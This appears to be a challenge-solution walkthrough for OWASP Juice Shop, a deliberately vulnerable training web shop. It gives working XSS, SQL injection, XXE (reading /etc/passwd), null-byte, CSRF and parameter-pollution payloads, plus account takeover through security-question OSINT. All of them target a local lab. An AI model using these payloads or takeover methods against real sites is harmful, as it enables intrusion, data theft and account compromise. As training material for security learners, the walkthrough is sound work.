Challenge solutions

Log in as any user.

Click Support Chat in the sidebar menu to visit http://localhost:3000/#/chatbot.

After telling the chatbot your name you can start chatting with it.

Ask it something similar to "Can I have a coupon code?" or "Please give me a discount!" and it will most likely decline with some unlikely excuse.

Keep asking for discount again and again until you finally receive a 10% coupon code for the current month! This also solves the challenge immediately.

Solve the Perform a DOM XSS attack challenge

Turn on your computer’s speakers!

Paste the payload <iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&color=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true"></iframe> into the Search…​ field and hit Enter

Enjoy the excellent acoustic entertainment!

Follow the link to titled Check out our boring terms of use if you are interested in such lame stuff (http://localhost:3000/ftp/legal.adoc) on the About Us page.

Successfully attempt to browse the directory by changing the URL into http://localhost:3000/ftp

Open http://localhost:3000/ftp/acquisitions.adoc to solve the challenge.

Scroll through https://prometheus.io/docs/introduction/first_steps

You should notice several mentions of /metrics as the default path scraped by Prometheus, e.g. "Prometheus expects metrics to be available on targets on a path of /metrics."

Visit http://localhost:3000/metrics to view the actual Prometheus metrics of the Juice Shop and solve this challenge

Read the Success Notifications section

It will explain that Shift-clicking the X-button on any "Challenge solved"-notification will close all open notifications of this kind

Solve any other challenge (or multiple) and then Shift-click the X-button on it to solve this challenge

Visit http://localhost:3000/#/photo-wall

Right-click Inspect the broken image in the entry labeled "😼 #zatschi #whoneedsfourlegs"

You should find an image tag similar to <img _ngcontent-akt-c18="" class="image" src="assets/public/images/uploads/😼-#zatschi-#whoneedsfourlegs-1572600969477.jpg" alt="😼 #zatschi #whoneedsfourlegs"> in the source

Right-click Open in new tab the src element of the image

Observe (in your DevTools Network tab) that the request sent to the server is http://localhost:3000/assets/public/images/uploads/%F0%9F%98%BC-

The culprit here are the two # characters in the URL, which are no problem for your OS in a filename, but are interpreted by your browser as HTML anchors. Thus, they are not transmitted to the server at all.

To get them over to the server intact, they must obviously be URL-encoded into %23

Open http://localhost:3000/assets/public/images/uploads/😼-%23zatschi-%23whoneedsfourlegs-1572600969477.jpg and enjoy the incredibly cute photo of this pet being happy despite missing half a hind leg

Go back to the application, and the challenge will be solved.

Log in to the application with any user.

Visit the Your Basket page and expand the Payment and Merchandise sections with the "credit card"-button.

Perceive that all donation links are passed through the to parameter of the route /redirect

Open main.js in your browser’s DevTools

Searching for /redirect?to= and stepping through all matches you will notice three functions that are called only from hidden buttons on the Your Basket page:

Open one of the three, e.g. http://localhost:3000/redirect?to=https://blockchain.info/address/1AbKfgvw9psQ41NbLi8kufDQTezwG8DRZm to solve the challenge.

Log in to the application with any user.

Open the dropdown menu on your profile picture and choose Privacy & Security.

You will find yourself on http://localhost:3000/#/privacy-security/privacy-policy which instantly solves this challenge for you.

Go to http://localhost:3000/#/register.

Fill out all required information except the Password and Repeat Password field.

Type e.g. 12345 into the Password field.

Now type 12345 into the Repeat Password field. While typing the numbers you will see Passwords do not match errors until you reach 12345.

Finally, go back to the Password field and change it into any other password. The Repeat Password field does not show the expected error.

Submit the form with Register which will solve this challenge.

Go to the Sources tab of your browsers DevTools and open the main.js file.

If your browser offers pretty-printing of this minified messy code, best use this offer. In Chrome this can be done with the "{}"-button.

Search for score and iterate through each finding to come across one looking like a route mapping section:

Navigate to http://localhost:3000/#/score-board to solve the challenge.

From now on you will see the additional menu item Score Board in the navigation bar.

Paste the attack string <iframe src="javascript:alert(`xss)">` into the Search…​ field.

Hit the Enter key.

An alert box with the text "xss" should appear.

The Submit button is still disabled because you did not select a Rating yet.

Inspect the Submit button with your DevTools and note the disabled attribute of the <button> HTML tag

Double click on disabled attribute to select it and then delete it from the tag.

The Submit button is now enabled.

Click the Submit button to solve the challenge.

You can verify the feedback was saved by checking the Customer Feedback widget on the About Us page.

Open the main.js in your browser’s developer tools and search for "admin".

One of the matches will be a route mapping to path: "administration".

Navigating to http://localhost:3000/#/administration will give a 403 Forbidden error.

Log in to an administrator’s account by solving the challenge

Log in as any user.

Put some products into your shopping basket.

Inspect the Session Storage in your browser’s developer tools to find a numeric bid value.

Change the bid, e.g. by adding or subtracting 1 from its value.

Visit http://localhost:3000/#/basket to solve the challenge.

Log in as any user.

Click Complain? in the Contact Us dropdown to go to the File Complaint form

Clicking the file upload button for Invoice and browsing some directories you might notice that .pdf and .zip files are filtered by default

Trying to upload another other file will probably give you an error message on the UI stating exactly that: Forbidden file type. Only PDF, ZIP allowed.

Open the main.js in your DevTools and find the declaration of the file upload (e.g. by searching for zip)

In the allowedMimeType array you will notice "application/xml" and "text/xml" along with the expected PDF and ZIP types

Click on the Choose File button.

In the File Name field enter *.xml and select any arbitrary XML file (<100KB) you have available. Then press Open.

Enter some Message text and press Submit to solve the challenge.

On the JavaScript Console of your browser you will see a suspicious 410 (Gone) HTTP Error. In the corresponding entry in the Network section of your browser’s DevTools, you should see an error message, telling you that B2B customer complaints via file upload have been deprecated for security reasons!

Log in to the application with any user.

Solve Access the administration section of the store

Delete all entries with five star rating from the Customer Feedback table using the trashcan button

Reading the hints for this challenge or googling "MC SafeSearch" will eventually bring the music video "Protect Ya' Passwordz" to your attention.

Watch this video to learn that MC used the name of his dog "Mr. Noodles" as a password but changed "some vowels into zeroes".

Visit http://localhost:3000/#/login and log in with Email mc.safesearch@juice-sh.op and Password Mr. N00dles to solve this challenge.

Visit http://localhost:3000/#/login.

Log in with Email admin@juice-sh.op and Password admin123 which is as easy to guess as it is to brute force or retrieve from a rainbow table.

Visit https://securitytxt.org/ to learn about a proposed standard which allows websites to define security policies.

Request the security policy file from the server at http://localhost:3000/.well-known/security.txt or http://localhost:3000/security.txt to solve the challenge.

Optionally, write an email to the mentioned contact address donotreply@owasp-juice.shop and see what happens…​ :e-mail:

Visit http://localhost:3000/#/contact.

Submit your feedback with one of the following words in the comment: z85, base85, base64, md5 or hashid.

Log in as any user.

Do some shopping and then visit the Order History.

Clicking on the little "Truck" button for any of your orders will show you the delivery status of your order.

Notice the id parameter in the URL http://localhost:3000/#/track-result?id=fe01-f885a0915b79f2a9 with fe01-f885a0915b79f2a9 being one of your order numbers?

As the fe01-f885a0915b79f2a9 is displayed on the screen, it might be susceptible to an XSS attack.

Paste the attack string <iframe src="javascript:alert(`xss)">` into that URL so that you have http://localhost:3000/#/track-result?id=%3Ciframe%20src%3D%22javascript:alert(%60xss%60)%22%3E

Refresh that URL to get the XSS payload executed and the challenge marked as solved.

Go to the photo wall and search for the photo that has been posted by the user j0hNny.

Download that photo.

Check the metadata of the photo. You can use various tools online like http://exif.regex.info/exif.cgi

When viewing the metadata, you can see the coordinates of where the photo was taken. The coordinates are 36.958717N 84.348217W

Search for these coordinates on Google to find out in which forest the photo was taken. It can be seen that the Daniel Boone National Forest is located on these coordinates.

Go to the login page and click on Forgot your password?.

Fill in john@juice-sh.op as the email and Daniel Boone National Forest as the answer of the security question.

Choose a new password and click on Change.

Go to the photo wall and search for the photo that has been posted by the user E=ma².

Open the image so that you can zoom in on it.

On the far left window on the middle floor, you can see a logo of a company. It can be seen that logo shows the name ITsec.

Go to the login page and click on Forgot your password?.

Fill in emma@juice-sh.op as the email and ITsec as the answer of the security question.

Choose a new password and click on Change.

Go to the About Us section and check for the comment "Please send me the juicy chatbot NFT in my wallet at /juicy-nft".

Find the 12 word seedphrase of the crypto wallet in that comment "purpose betray marriage blame crunch monitor spin slide donate sport lift clutch".

Visit /juicy-nft in the Juice Shop App.

You can see an input box to enter the private keys of the wallet to access the NFT.

Use the seedphrase found in the comment to derive the private key of the first Ethereum wallet. You can visit https://iancoleman.io/bip39/ to get the same.

Enter the private key derived in the input box "0x5bcc3e9d38baa06e7bfaab80ae5957bbe8ef059e640311d7d6d465e6bc948e3e".

Submit a POST request to http://localhost:3000/api/Users with:

Upon your next visit to the application’s web UI the challenge will be marked as solved.

Log in as any user.

Inspect HTTP traffic while putting items into your own shopping basket to learn your own BasketId. For this solution we assume yours is 1 and another user’s basket with a BasketId of 2 exists.

Submit a POST request to http://localhost:3000/api/BasketItems with payload as {"ProductId": 14,"BasketId": "2","quantity": 1} making sure no product of that with ProductId of 14 is already in the target basket. Make sure to supply your Authorization Bearer token in the request header.

You will receive a (probably unexpected) response of {'error' : 'Invalid BasketId'} - after all, it is not your basket!

Change your POST request into utilizing HTTP Parameter Pollution (HPP) by supplying your own BasketId and that of someone else in the same payload, i.e. {"ProductId": 14,"BasketId": "1","quantity": 1,"BasketId": "2"}.

Submitting this request will satisfy the validation based on your own BasketId but put the product into the other basket!

Open the Network tab of your browser DevTools and visit http://localhost:3000/#/contact

You should notice a GET request to http://localhost:3000/rest/captcha/ which retrieves the CAPTCHA for the feedback form. The HTTP response body will look similar to {"captchaId":18,"captcha":"5*8*8","answer":"320"}.

Fill out the form normally and submit it while checking the backend interaction in your Developer Tools. The CAPTCHA identifier and solution are transmitted along with the feedback in the request body: {comment: "Hello", rating: 1, captcha: "320", captchaId: 18}

You will notice that a new CAPTCHA is retrieved from the REST endpoint. It will present a different math challenge, e.g. {"captchaId":19,"captcha":"1*1-1","answer":"0"}

Write another feedback but before sending it, change the captchaId and captcha parameters to the previous values of captchaId and answer. In this example you would submit captcha: "320", captchaId: 18 instead of captcha: "0", captchaId: 19.

The server will accept your feedback, telling your that the CAPTCHA can be pinned to any previous one you like.

Write a script with a 10-iteration loop that submits feedback using your pinned captchaId and captcha parameters. Running this script will solve the challenge.

Open Juice Shop in a web browser which sets cookies with SameSite=None by default. With Firefox 96.x or Chrome 79.x this has been successfully tested, but feel free to try other browsers at your leisure.

Login with any user account. This user is going to be the victim of the CSRF attack.

Navigate to http://htmledit.squarefree.com in the same browser. It is intentional that the site is accessed without TLS, as otherwise there might be issues with the mixed-content policy of the browser.

In the upper frame of the page, paste the following HTML fragment, which contains a self-submitting HTML form:

The attack is performed immediately. You will see an error message or a blank page in the lower frame, because even though the online HTML editor is allowed to send requests to Juice Shop, it is not permitted to embed the response.

Verify that the username got changed to "CSRF" by checking the profile page.

From any errors seen during previous SQL Injection attempts you should know that SQLite is the relational database in use.

Check https://www.sqlite.org/faq.html to learn in "(7) How do I list all tables/indices contained in an SQLite database" that the schema is stored in a system table sqlite_master.

You will also learn that this table contains a column sql which holds the text of the original CREATE TABLE or CREATE INDEX statement that created the table or index. Getting your hands on this would allow you to replicate the entire DB schema.

During the Order the Christmas special offer of 2014 challenge you learned that the /rest/products/search endpoint is susceptible to SQL Injection into the q parameter.

The attack payload you need to craft is a UNION SELECT merging the data from the sqlite_master table into the products returned in the JSON result.

As a starting point we use the known working '))-- attack pattern and try to make a UNION SELECT out of it

Searching for ')) UNION SELECT * FROM x-- fails with a SQLITE_ERROR: no such table: x as you would expect.

Searching for ')) UNION SELECT * FROM sqlite_master-- fails with a promising SQLITE_ERROR: SELECTs to the left and right of UNION do not have the same number of result columns which least confirms the table name.

The next step in a UNION SELECT-attack is typically to find the right number of returned columns. As the Search Results table in the UI has 3 columns displaying data, it will probably at least be three. You keep adding columns until no more SQLITE_ERROR occurs (or at least it becomes a different one):

Next you get rid of the unwanted product results changing the query into something like qwert')) UNION SELECT '1', '2', '3', '4', '5', '6', '7', '8', '9' FROM sqlite_master-- leaving only the "UNIONed" element in the result set

The last step is to replace one of the fixed values with correct column name sql, which is why searching for qwert')) UNION SELECT sql, '2', '3', '4', '5', '6', '7', '8', '9' FROM sqlite_master-- solves the challenge.

If wallet is empty: a. Go to http://localhost:3000/#/payment/deluxe and look at the available payment options for upgrading to a deluxe account b. Open devtools and inspect the pay button next to the "pay using wallet" option. c. Remove the disabled="true" attribute from the element to enable it. d. Switch to the network tab and devtools and click on the button to initiate payment e. See that there is a POST request sent, which only contains one parameter in the request payload, "paymentMode", which is set to "wallet". The response contains an error saying your wallet doesn’t contain sufficient funds d. Right click on the request and select "edit and resend" e. Change the paymentMode parameter to an empty string and press send. This solves the challenge and juice-shop no longer knows where to deduct the money from

If wallet isn’t empty: a. If your wallet contains funds, you cannot start a dummy transaction to inspect the request structure because then you would be automatically upgraded to deluxe. b. Set up a proxy like OWASP ZAP, Fiddler aur Burp Suite. c. Click on the pay button d. Intercept and edit the request as described above before forwarding it.

Go to the Contact Us form on http://localhost:3000/#/contact.

Inspect the DOM of the form in your browser to spot this suspicious text field right at the top: <input _ngcontent-c23 hidden id="userId" type="text" class="ng-untouched ng-pristine ng-valid">

In your browser’s developer tools remove the hidden attribute from above <input> tag.

The field should now be visible in your browser. Type any user’s database identifier in there (other than your own if you are currently logged in) and submit the feedback.

Select any product and write a review for it

Submit the review while observing the Networks tab of your browser.

Analyze the PUT request.

Change the author name to admin@juice-sh.op in Request Body and re-send the request.

Google for either 93.83 billion trillion trillion centuries or One Important Final Note.

Both searches should show https://www.grc.com/haystack.htm as one of the top hits.

After reading up on Password Padding try the example password D0g.....................

She actually did a very similar padding trick, just with the name of her husband Kif written as K1f instead of D0g from the example! She did not even bother changing the padding length!

Visit http://localhost:3000/#/login and log in with credentials amy@juice-sh.op and password K1f..................... to solve the challenge

Log in as any user.

Put at least one item into your shopping basket.

Note that reducing the quantity of a basket item below 1 is not possible via the UI

When changing the quantity via the UI, you will notice PUT requests to http://localhost:3000/api/BasketItems/{id} in the Network tab of your DevTools

Memorize the {id} of any item in your basket

Copy your Authorization header from any HTTP request submitted via browser.

Submit a PUT request to http://localhost:3000/api/BasketItems/{id} replacing {id} with the memorized number from 5. and with:

Visit http://localhost:3000/#/basket to view Your Basket with the negative quantity on the first item

Click Checkout to issue the negative order and solve this challenge.

Open http://localhost:3000/#/privacy-security/privacy-policy.

Moving your mouse cursor over each paragraph will make a fire-effect appear on certain words or partial sentences.

Inspect the HTML in your browser and note down all text inside <span class="hot"> tags, which are http://localhost, We may also, instruct you, to refuse all, reasonably necessary and responsibility.

Combine those into the URL http://localhost:3000/we/may/also/instruct/you/to/refuse/all/reasonably/necessary/responsibility (adding the server port if needed) and solve the challenge by visiting it.

By searching for O-Saft directly via the REST API with http://localhost:3000/rest/products/search?q=o-saft you will learn that it’s database ID is 9.

Submit a PUT request to http://localhost:3000/api/Products/9 with:

Visit http://localhost:3000/#/forgot-password and provide bjoern@owasp.org as your Email.

You will notice that the security question Bjoern chose is Name of your favorite pet?

Find Bjoern’s Twitter profile at https://twitter.com/bkimminich

Going through his status updates or media you’ll spot a few photos of a cute cat and eventually also find the Tweet https://twitter.com/bkimminich/status/1441659996589207555 or maybe the more recent https://twitter.com/bkimminich/status/1594985736650035202

The text of this Tweet spoilers the name of the cat as "Zaya"

Visit http://localhost:3000/#/forgot-password again and once more provide bjoern@owasp.org as your Email.

In the subsequently appearing form, provide Zaya as Name of your favorite pet?

Then type any New Password and matching Repeat New Password

Click Change to solve this challenge

Visit http://localhost:3000/#/forgot-password and provide jim@juice-sh.op as your Email to learn that Your eldest siblings middle name? is Jim’s chosen security question

Jim (whose UserId happens to be 2) left some breadcrumbs in the application which reveal his identity

It should eventually become obvious that James T. Kirk is the only viable solution to the question of Jim’s identity

Visit https://en.wikipedia.org/wiki/James_T._Kirk and read the Depiction section

It tells you that Jim has a brother named George Samuel Kirk

Visit http://localhost:3000/#/forgot-password and provide jim@juice-sh.op as your Email

In the subsequently appearing form, provide Samuel as Your eldest siblings middle name?

Then type any New Password and matching Repeat New Password

Click Change to solve this challenge

The client-side validation prevents uploads larger than 100 kB.

Craft a POST request to http://localhost:3000/file-upload with a form parameter file that contains a PDF file of more than 100 kB but less than 200 kB.

The response from the server will be a 204 with no content, but the challenge will be successfully solved.

Craft a POST request to http://localhost:3000/file-upload with a form parameter file that contains a non-PDF file with a size of less than 200 kB.

The response from the server will be a 204 with no content, but the challenge will be successfully solved.

Submit a POST request to http://localhost:3000/api/Users with

Log in to the application with an admin.

Visit http://localhost:3000/#/administration.

An alert box with the text "xss" should appear.

Close this box. Notice the somewhat broken looking row in the Registered Users table?

Click the "eye"-button in that row.

A modal overlay dialog with the user details opens where the attack string is rendered as harmless text.

Log in to the application with any user.

Copy your Authorization header from any HTTP request submitted via browser.

Submit a POST request to http://localhost:3000/api/Products with

Visit http://localhost:3000/#/search.

An alert box with the text "xss" should appear.

Close this box. Notice the product row which has a frame border in the description in the All Products table

Click the "eye"-button next to that row.

Another alert box with the text "xss" should appear. After closing it the actual details dialog pops up showing the same frame border.

Solve the Use a deprecated B2B interface that was not properly shut down challenge.

Prepare an XML file which defines and uses an external entity <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> (or <!ENTITY xxe SYSTEM "file:///C:/Windows/system.ini" >]> on Windows).

Upload this file through the File Complaint dialog and observe the Javascript console while doing so. It should give you an error message containing the parsed XML, including the contents of the local system file!

Go to the photo wall and search for the photo that looks out of place posted by evmrox.

Visit /bee-haven on Juice Shop as mentioned on the posted comment.

Install Metamask Browser Extension if not done yet.

Get some Sepolia testnet ETH from any faucet https://sepoliafaucet.com .

You need to withdraw 1000 BEE tokens from the BEE Haven to mint the NFT.

Withdraw any amount less than 255 tokens from the faucet until you get a 1000 BEE Balance, the faucet balance underflows to 255 as soon as the BEE balance becomes less than 0.

Mint the Honey Pot NFT.

Solve the Access a confidential document or any related challenges which will bring the exposed /ftp folder to your attention.

Visit http://localhost:3000/ftp and notice the file incident-support.kdbx which is needed for Log in with the support team’s original user credentials and indicates that some support team is performing its duties from the public Internet and possibly with VPN access.

Guess luckily or run a brute force attack with e.g. OWASP ZAPs DirBuster plugin for a possibly exposed directory containing the log files.

Following the hint to drill down deeper than one level, you will at some point end up with http://localhost:3000/support/logs.

Inside you will find at least one access.log of the current day. Open or download it to solve this challenge.

Log in as any user.

Visit our user profile page at http://localhost:3000/profile.

Type in any Username and click the Set Username button.

Notice that the username is displayed beneath the profile image.

Change the username into <script>alert(`xss)</script>` and click Set Username.

Notice the displayed username under the profile picture now is lert(`xss)` while in the Username field it shows lert(`xss)</script>` - both a clear indication that the malicious input was sanitized. Obviously the sanitization was not very sophisticated, as the input was quite mangled and even the closing <script> tag survived the procedure.

Change the username into <<a|ascript>alert(`xss)</script>` and click Set Username.

The naive sanitizer only removes <a|a effectively changing the username into <script>alert(`xss)</script>` but you’ll notice that the script is still not executed!

The username shows as \ on the screen and the <script>alert(`xss)</script>` is part of the DOM. It seems that its execution was blocked by the Content Security Policy (CSP) of the page.

Bypassing the CSP requires to exploit a totally different attack vector on the profile page: The Image URL field.

Set the Image URL to some valid image URL, e.g. https://placekitten.com/300/300 and click Link Image while inspecting the network traffic via your browser’s DevTools.

Notice how the Content-Security-Policy response header has been changed in the subsequent call to http://localhost:3000/profile? It now contains an entry like /assets/public/images/uploads/17.jpg;, which is the location of the successfully uploaded image.

Try setting the Image URL again, but now to some invalid image URL, e.g. http://definitely.not.an/image.png. While the linking fails and your profile will show a broken image, the CSP header will now contain http://definitely.not.an/image.png; - the originally supplied URL.

This influence on the CSP header - plus the fact that the first encountered entry in case of duplicates always wins - is fatal for the application. We can basically overwrite the CSP with one of our own choosing.

Set https://a.png; script-src 'unsafe-inline' 'self' 'unsafe-eval' https://code.getmdl.io http://ajax.googleapis.com as Image URL and click _Link Image.

Refresh the page to give the browser the chance to load the tampered CSP and enjoy the alert box popping up!

Open http://localhost:3000/#/search and reload the page with F5 while observing the Network tab in your browser’s DevTools

Recognize the GET request http://localhost:3000/rest/products/search?q= which returns the product data.

Submitting any SQL payloads via the Search field in the navigation bar will do you no good, as it is only applying filters onto the entire data set what was retrieved with a singular call upon loading the page.

In that light, the q= parameter on the http://localhost:3000/rest/products/search endpoint would not even be needed, but might be a relic from a different implementation of the search functionality. Test this theory by submitting http://localhost:3000/rest/products/search?q=orange which should give you a result such as

Submit '; as q via http://localhost:3000/rest/products/search?q=';

You will receive an error page with a SQLITE_ERROR: syntax error mentioned, indicating that SQL Injection is indeed possible.

You are now in the area of Blind SQL Injection, where trying create valid queries is a matter of patience, observance and a bit of luck.

Varying the payload into '-- for q results in a SQLITE_ERROR: incomplete input. This error happens due to two (now unbalanced) parenthesis in the query.

Using '))-- for q fixes the syntax and successfully retrieves all products, including the (logically deleted) Christmas offer. Take note of its id (which should be 10)

Go to http://localhost:3000/#/login and log in as any user.

Add any regularly available product into you shopping basket to prevent problems at checkout later. Memorize your BasketId value in the request payload (when viewing the Network tab) or find the same information in the bid variable in your browser’s Session Storage (in the Application tab).

Craft and send a POST request to http://localhost:3000/api/BasketItems with

Go to http://localhost:3000/#/basket to verify that the "Christmas Super-Surprise-Box (2014 Edition)" is in the basket

Click Checkout on the Your Basket page to solve the challenge.

Solve Order the Christmas special offer of 2014 but enumerate all deleted products until you come across "Rippertuer Special Juice"

Notice the warning "This item has been made unavailable because of lack of safety standards." in its description, indicating that this is the product you need to investigate for this challenge

Further notice the partial list of ingredients in the description namely "Cherymoya Annona cherimola, Jabuticaba Myrciaria cauliflora, Bael Aegle marmelos…​ and others"

Submitting either or all of the above ingredients at http://localhost:3000/#/contact will not solve this challenge - it must be some unlisted ingredients that create a dangerous combination.

A simple Google search for Cherymoya Annona cherimola Jabuticaba Myrciaria cauliflora Bael Aegle marmelos should bring up several results, one of them being a blog post "Top 20 Fruits You Probably Don’t Know" from 2011. Visit this post at https://listverse.com/2011/07/08/top-20-fruits-you-probably-dont-know

Scrolling through the list of replies you will notice a particular comment from user Localhorst saying "Awesome, some of these fruits also made it into our "Rippertuer Special Juice"! https://pastebin.com/90dUgd7s "

Visit https://pastebin.com/90dUgd7s to find a PasteBin paste titled "Rippertuer Special Juice Ingredients" containing a JSON document with many exotic fruits in it, each with its name as type and a detailed description

When carefully reading all fruit descriptions you will notice a warning on the Hueteroneel fruit that "this coupled with Eurogium Edule was sometimes found fatal"

As Eurogium Edule is also on the very same list of ingredients, these two must be the ones you are looking for

Submit a comment containing both Eurogium Edule and Hueteroneel via http://localhost:3000/#/contact to solve this challenge

Use the Poison Null Byte attack described in Access a developer’s forgotten backup file…​

…​to download http://localhost:3000/ftp/eastere.gg%2500.adoc

Get the encrypted string from the eastere.gg from the Find the hidden easter egg challenge: L2d1ci9xcmlmL25lci9mYi9zaGFhbC9ndXJsL3V2cS9uYS9ybmZncmUvcnR0L2p2Z3V2YS9ndXIvcm5mZ3JlL3J0dA==

Base64-decode this into /gur/qrif/ner/fb/shaal/gurl/uvq/na/rnfgre/rtt/jvguva/gur/rnfgre/rtt

Trying this as a URL will not work. Notice the recurring patterns (rtt, gur etc.) in the above string

ROT13-decode this into /the/devs/are/so/funny/they/hid/an/easter/egg/within/the/easter/egg

Visit http://localhost:3000/the/devs/are/so/funny/they/hid/an/easter/egg/within/the/easter/egg

Marvel at the real easter egg: An interactive 3D scene of Planet Orangeuze!

Open main.js in your Browser’s dev tools and search for campaign.

You will find a this.campaigns assignment of an object containing various campaign codes. Depending on when you are reading this book, one or more of these might be expired. Let’s continue with the oldest available one, which is WMNSDY2019.

A bit further down in the minified code you will notice a function applyCoupon() that uses this.campaigns and in particular the contained validOn timestamp of a coupon.

Ignoring that validity check and just submitting WMNSDY2019 will yield an Invalid Coupon. error, as you would expect. This is because of the second part of the assertion this.clientDate === e.validOn.

Converting validOn: 15519996e5 of the WMNSDY2019 coupon into a JavaScript date will tell you that this campaign was active on March 8th 2019 only: Women’s Day!

Set the time of your computer to March 8th 2019 and try to submit the code again.

This time it will be accepted! Proceed to Checkout to get the challenge solved.

Browse to http://localhost:3000/ftp (like in Access a confidential document.

Opening http://localhost:3000/ftp/package.json.bak directly will fail complaining about an illegal file type.

Using a Poison Null Byte (%00) the filter can be tricked, but only with a twist:

http://localhost:3000/ftp/package.json.bak%2500.adoc will ultimately solve the challenge.

Use the Poison Null Byte attack described in Access a developer’s forgotten backup file…​

…​to download http://localhost:3000/ftp/coupons_2013.adoc.bak%2500.adoc

Bjoern has registered via Google OAuth with his (real) account bjoern.kimminich@googlemail.com.

Cracking his password hash will probably not work.

To find out how the OAuth registration and login work, inspect the main.js and search for oauth, which will eventually reveal a function userService.oauthLogin().

In the function body you will notice a call to userService.save() - which is used to create a user account in the non-Google User Registration process - followed by a call to the regular userService.login()

The save() and login() function calls both leak how the password for the account is set: password: btoa(n.email.split("").reverse().join(""))

Some Internet search will reveal that window.btoa() is a default function to encode strings into Base64.

What is passed into btoa() is email.split("").reverse().join(""), which is simply the email address string reversed.

Now all you have to do is Base64-encode moc.liamg@hcinimmik.nreojb, so you can log in directly with Email bjoern.kimminich@gmail.com and Password bW9jLmxpYW1nQGhjaW5pbW1pay5ucmVvamI=.

Log in as any user, put some items into your basket and create an order from these.

Notice that you end up on a URL with a seemingly generated random part, like http://localhost:3000/#/order-completion/5267-829f123593e9d098

On that Order Summary page, click on the Track Orders link under the Thank you for your purchase! message to end up on a URL simular to http://localhost:3000/#/track-result/new?id=5267-829f123593e9d098

Open the network tab of your browser’s DevTools and refresh that page. You should notice a request similar to http://localhost:3000/rest/track-order/5267-829f123593e9d098.

Inspecting the response closely, you might notice that the user email address is partially obfuscated: {"status":"success","data":[{"orderId":"5267-829f123593e9d098","email":"*dm*n@j**c*-sh.*p","totalPrice":2.88,"products":[{"quantity":1,"name":"Apple Juice (1000ml)","price":1.99,"total":1.99,"bonus":0},{"quantity":1,"name":"Apple Pomace","price":0.89,"total":0.89,"bonus":0}],"bonus":0,"eta":"2","_id":"tosmfPsDaWcEnzRr3"}]}

It looks like certain letters - seemingly all vowels - were replaced with * characters before the order was stored in the database.

Register a new user with an email address that would result in the exact same obfuscated email address. For example register edmin@juice-sh.op to steal the data of admin@juice-sh.op.

Log in with your new user and immediately get your data exported via http://localhost:3000/#/privacy-security/data-export.

You will notice that the order belonging to the existing user admin@juice-sh.op (in this example 5267-829f123593e9d098) is part of your new user’s data export due to the clash when obfuscating emails!

Use the Poison Null Byte attack described in Access a developer’s forgotten backup file…​

…​to download http://localhost:3000/ftp/suspicious_errors.yml%2500.adoc

You can interact with the backend API for product reviews via the dedicated endpoints /rest/products/reviews and /rest/products/{id}/reviews

Get the reviews of the product with database ID 1: http://localhost:3000/rest/products/1/reviews

Inject a sleep(integer ms) command by changing the URL into http://localhost:3000/rest/products/sleep(2000)/reviews to solve the challenge

Log in as any user to get your Authorization token from any subsequent request’s headers.

Submit a PATCH request to http://localhost:3000/rest/products/reviews with

Check different product detail dialogs to verify that all review texts have been changed into NoSQL Injection!

Pick one of the redirect links in the application, e.g. http://localhost:3000/redirect?to=https://github.com/juice-shop/juice-shop from the GitHub-button in the navigation bar.

Trying to redirect to some unrecognized URL fails due to allowlist validation with 406 Error: Unrecognized target URL for redirect.

Removing the to parameter (http://localhost:3000/redirect) will instead yield a 500 TypeError: Cannot read property 'indexOf' of undefined where the indexOf indicates a severe flaw in the way the allowlist works.

Craft a redirect URL so that the target-URL in to comes with an own parameter containing a URL from the allowlist, e.g. http://localhost:3000/redirect?to=http://kimminich.de?pwned=https://github.com/juice-shop/juice-shop

Solve Access a developer’s forgotten backup file, Access a salesman’s forgotten backup file, Access a misplaced SIEM signature file or Find the hidden easter egg to solve this challenge as a by-product.

Trying to find out who "Bender" might be should immediately lead you to Bender from Futurama as the only viable option

Visit https://en.wikipedia.org/wiki/Bender_(Futurama) and read the Character Biography section

It tells you that Bender had a job at the metalworking factory, bending steel girders for the construction of suicide booths.

Find out more on Suicide Booths on http://futurama.wikia.com/wiki/Suicide_booth

This site tells you that their most important brand is Stop’n’Drop

Visit http://localhost:3000/#/forgot-password and provide bender@juice-sh.op as your Email

In the subsequently appearing form, provide Stop’n’Drop as Company you first work for as an adult?

Then type any New Password and matching Repeat New Password

Click Change to solve this challenge

To reset Uvogin’s password, you need the to find out what his favorite movie is in order to answer his security question. This is the kind of information that people often carelessly expose online.

People often tend to reuse aliases on different websites. Sherlock is a great tool for finding social media accounts with known aliases/pesudonyms.

Unfortunately, plugging uvogin into sherlock yields nothing of interest. Reading the reviews left by uvogin on the various products, one can notice that they have quite an affinity for leetspeak

Trying out a few variations of the alias uvogin, uv0gin leads us to a twitter account with a similarly written tweet which references a vulnerable beverage store. However nothing about his favorite movie

The WayBack can be used to check for older versions of their profile page to look for deleted tweets. And indeed, one of the snapshots available on WayBack contains a deleted tweet that references Silence of the Lambs which is infact the correct answer to his security question

Looking for irregularities among the image files you will at some point notice that 5.png is the only PNG file among otherwise only JPGs in the customer feedback carousel:

Running this image through some decoders available online will probably just return garbage, e.g. http://stylesuxx.github.io/steganography/ gives you gibberish looking something like ÿÁÿm¶Û$ÿHÕPü^ÛN'c±UY;fäHÜmÉ#r<v¸ or https://www.mobilefish.com/services/steganography/steganography.php gives up with No hidden message or file found in the image. On https://incoherency.co.uk/image-steganography/#unhide you will also find nothing independent of how you set the Hidden bits slider:

Moving on to client applications you might end up with OpenStego which is built in Java but also offers a Windows installer at https://github.com/syvaidya/openstego/releases.

Selecting the 5.png and clicking Extract Data OpenStego will quickly claim to have been successful:

The image that will be put into the Output Stego file location clearly depicts a pixelated version of Pickle Rick (from S3E3 - one of the best Rick & Morty episodes ever)

Visit http://localhost:3000/#/contact

Submit your feedback containing the name Pickle Rick (case doesn’t matter) to solve this challenge.

Solve the Access a developer’s forgotten backup file challenge and open the package.json.bak file

Scrutinizing each entry in the dependencies list you will at some point get to epilogue-js, the overview page of which gives away that you find the culprit at https://www.npmjs.com/package/epilogue-js

Visit http://localhost:3000/#/contact

Submit your feedback with epilogue-js in the comment to solve this challenge

During the Order the Christmas special offer of 2014 challenge you learned that the /rest/products/search endpoint is susceptible to SQL Injection into the q parameter.

The attack payload you need to craft is a UNION SELECT merging the data from the user’s DB table into the products returned in the JSON result.

As a starting point we use the known working '))-- attack pattern and try to make a UNION SELECT out of it

Searching for ')) UNION SELECT * FROM x-- fails with a SQLITE_ERROR: no such table: x as you would expect. But we can easily guess the table name or infer it from one of the previous attacks on the Login form where even the underlying SQL query was leaked.

